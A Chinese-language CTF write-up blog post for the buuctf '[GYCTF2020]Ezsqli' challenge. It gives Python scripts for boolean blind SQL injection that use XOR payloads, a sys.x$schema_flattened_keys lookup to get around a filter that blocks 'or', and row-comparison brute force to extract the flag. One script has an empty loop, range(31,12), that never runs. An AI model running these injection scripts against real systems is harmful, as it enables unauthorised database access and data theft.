Z1d10tのBlog

A note for myself,have fun!

buuctf-86-[GYCTF2020]Ezsqli

Z1d10t's Avatar 2023-04-29 buuctf

分享本文
  1. 1. 爆库:
  2. 2. 爆表:
  3. 3. 爆flag

[GYCTF2020]Ezsqli

一眼丁真,鉴定为sql盲注。

爆库:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests #调requests模块
import time
url = 'http://b5c5750a-2950-4463-bba1-7eb101bc3c20.node4.buuoj.cn:81/'  
#payload = {"id":"0^(ascii(substr((select database()),1,1))>97)"}
database = ''
for i in range (1,25):
    for j in range(31,128):
        payload = {"id":"0^(ascii(substr((select database()),{},1))={})".format(i,j)}
        r = requests.post(url,data=payload)
        time.sleep(0.005)
        if 'Nu1L' in r.text:
            database+=chr(j)
            print(database)
            continue
        else:
            pass
# 爆库 give_grandpa_pa_pa_pa

img

库没用其实,之后可以用database()代替 而且and也是被河蟹了 give_grandpa_pa_pa_pa 库名用不了的

爆表:

因为or被河蟹

所以不能用information_schema来查询 用sys.x$schema_flattened_keys来代替

参考:https://nosec.org/home/detail/3830.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests #调requests模块
import time
url = 'http://b5c5750a-2950-4463-bba1-7eb101bc3c20.node4.buuoj.cn:81/'  
#payload = {"id":"0^ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),1,1))<103"}
tables = ''
for i in range (1,50):
    for j in range(31,12):
        payload = {"id":"0^(ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),{},1))={})".format(i,j)}
        r = requests.post(url,data=payload)
        time.sleep(0.005)
        if 'Nu1L' in r.text:
            tables+=chr(j)
            print(tables)
            continue
        else:
            pass

img

使用二分法改进后:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests #调requests模块
import time
url = 'http://b5c5750a-2950-4463-bba1-7eb101bc3c20.node4.buuoj.cn:81/'  
tables = ""
for i in range (1,50):
    low=31
    high=127
    mid = (low+high)//2
    while low<=high:
        payload = {"id":"0^(ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})".format(i,mid)}
        r = requests.post(url,data=payload)
        if("Nu1L" in r.text):
            low=mid+1
            mid = (low+high)//2
        else:
            high=mid-1
            mid = (low+high)//2
    tables+=chr(high+1)
    print(tables)
    time.sleep(0.3)

爆flag

这里用到了列比较去试flag

image.png

0^((1,'{0}')>(select * from f1ag_1s_h3r3_hhhhh)) 这里的 1是猜测第一列一般为索引id 1,因此在这里用1,之后就是去慢慢写脚本去试字符,这里写脚本的时候要加上之前已经爆出的字符慢慢去比较。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests #调requests模块
import time
url = 'http://b5c5750a-2950-4463-bba1-7eb101bc3c20.node4.buuoj.cn:81/'  
flag = ""
for i in range (1,50):
    low=31
    high=127
    mid = (low+high)//2
    while low<=high:
        flag_1 = flag + chr(mid)
        payload = {"id":"0^((1,'{0}')>(select * from f1ag_1s_h3r3_hhhhh))".format(flag_1)}
        r = requests.post(url,data=payload)
        if("Nu1L" in r.text):
            high=mid-1
            mid = (low+high)//2
        else:
            low=mid+1
            mid = (low+high)//2
    print(flag,chr(high))
    flag+=chr(high)
    time.sleep(2)

img

本文最后更新于 天前,文中所描述的信息可能已发生改变

本文发表于  , 最后修改于 

buuctf